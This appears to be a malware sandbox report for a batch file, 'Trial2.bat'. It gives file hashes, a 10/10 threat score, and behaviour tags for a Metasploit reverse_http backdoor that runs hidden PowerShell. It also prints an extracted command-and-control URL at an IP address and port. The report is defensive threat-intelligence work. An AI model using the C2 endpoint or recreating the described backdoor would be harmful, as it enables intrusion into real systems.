Overview

overview

10

Static

static

1

Trial2.bat

windows7-x64

10

Trial2.bat

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Trial2.bat

  • Size

    7KB

  • Sample

    240922-mhhb3svdjc

  • MD5

    d73df76a7d5d41df1d142a0c19c79b55

  • SHA1

    c7b38ae31d4126a59f997d0482c05916bf5c1bb7

  • SHA256

    5839d7d67a82e7c93deafb5807391b3a0e12ab31b154cd3f8a7ff3318c14bd0b

  • SHA512

    60f9c71aa1415b2cc98e900deecdfc5af2b5aab9ae162b91eabb832cf3d9e31afad1524f651884ab960b1c86b1bed34cb30ebc3cde3a70dab59a5f6811acbc44

  • SSDEEP

    192:+n2jh1hqT25k3YuH7khy35gwIpzwaks8ip0B2dHhW:+n2jh1hsV3YA77JgwIh9kVP4dHhW

Score
10/10
metasploitbackdoordiscoveryexecutiontrojan

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_http

C2

http://89.197.154.116:7810/mvwulwd81SULrQqsbU_9bQuOBCYQThonLjgcbDpQLZGAV-nrYVywa1G3r1ADsgXd8uRPi_Av0kPjniop2p2pjII4ZZWMxMi

Targets

    • Target

      Trial2.bat

    • Size

      7KB

    • MD5

      d73df76a7d5d41df1d142a0c19c79b55

    • SHA1

      c7b38ae31d4126a59f997d0482c05916bf5c1bb7

    • SHA256

      5839d7d67a82e7c93deafb5807391b3a0e12ab31b154cd3f8a7ff3318c14bd0b

    • SHA512

      60f9c71aa1415b2cc98e900deecdfc5af2b5aab9ae162b91eabb832cf3d9e31afad1524f651884ab960b1c86b1bed34cb30ebc3cde3a70dab59a5f6811acbc44

    • SSDEEP

      192:+n2jh1hqT25k3YuH7khy35gwIpzwaks8ip0B2dHhW:+n2jh1hsV3YA77JgwIh9kVP4dHhW

    Score
    10/10
    metasploitbackdoordiscoveryexecutiontrojan

    • MetaSploit

      Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

      trojanbackdoormetasploit

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

      execution
    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks